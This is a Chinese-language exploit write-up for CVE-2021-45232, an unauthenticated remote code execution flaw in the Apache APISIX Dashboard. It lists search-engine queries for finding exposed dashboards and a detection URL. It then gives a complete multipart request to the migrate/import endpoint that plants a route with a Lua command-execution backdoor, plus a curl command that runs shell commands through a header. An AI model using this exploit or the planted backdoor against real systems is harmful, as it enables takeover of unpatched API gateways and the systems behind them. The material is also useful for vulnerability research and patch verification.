CVE-2021-45232 Apache apisix Dashboard api unauth rce Version: < 2.10.1
Fofa: title=“Apache APISIX Dashboard”
Poc: url+/apisix/admin/migrate/export
Exp: url+/apisix/admin/migrate/import
0x01 检索
Fofa:title="Apache APISIX Dashboard"
ZoomEye:title:"Apache APISIX Dashboard"
Shodan:http.title:"Apache APISIX Dashboard"
data:image/s3,"s3://crabby-images/9e882/9e8821f89cd308af17c6b004a4d6287d289d4a09" alt=""
0x02 检测
能访问 http://x.x.x:9000/apisix/admin/migrate/export 则说明存在未授权访问配置文件,大概率可进行rce。
data:image/s3,"s3://crabby-images/d7f04/d7f046d829d7d7fbeac043a6cebbc82bfc2720e1" alt="图来自o2oxy.cn"
0x03 利用
向 /apisix/admin/migrate/import 构造数据包提交,添加路由:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
| POST /apisix/admin/migrate/import HTTP/1.1 Host: x.x.x.x:9000 User-Agent: python-requests/2.25.1 Accept-Encoding: gzip, deflate Accept: */* Connection: close Content-Length: 666 Content-Type: multipart/form-data; boundary=f82165b5e633b8e3fba86bbf468e1546
--f82165b5e633b8e3fba86bbf468e1546 Content-Disposition: form-data; name="file"; filename="data" Content-Type: text/data
{"Counsumers": [], "Routes": [{"id": "673366244208765680", "create_time": 1640674554, "update_time": 1640677637, "uris": ["/QeMpHt"], "name": "QeMpHt", "methods": ["GET", "POST"], "script": "local file=io.popen(ngx.req.get_headers()['cmd'],'r') \n local output=file:read('*all') \n file:close() \n ngx.say(output)", "status": 1}], "Services": [], "SSLs": [], "Upstreams": [], "Scripts": [], "GlobalPlugins": [], "PluginConfigs": []}xxxx #这里有不可见字符 --f82165b5e633b8e3fba86bbf468e1546--
|
curl 请求 apisix 管理端口9080+ uris
中的 /QeMpHt
, 即:
1
| curl http://x.x.x.x:9080/QeMpHt -H "cmd: ifconfig"
|
data:image/s3,"s3://crabby-images/1e89e/1e89e21e4975b77d7144e050618b729b986369da" alt=""
使用poython提交数据、执行命令。
py脚本: GitHub
data:image/s3,"s3://crabby-images/31c72/31c7250a3721433b9c9f108b6d299d91728a8f7f" alt=""
Reference
https://mp.weixin.qq.com/s/Me2bjRtmBQv--Aj9I_2cwg
https://www.o2oxy.cn/3945.html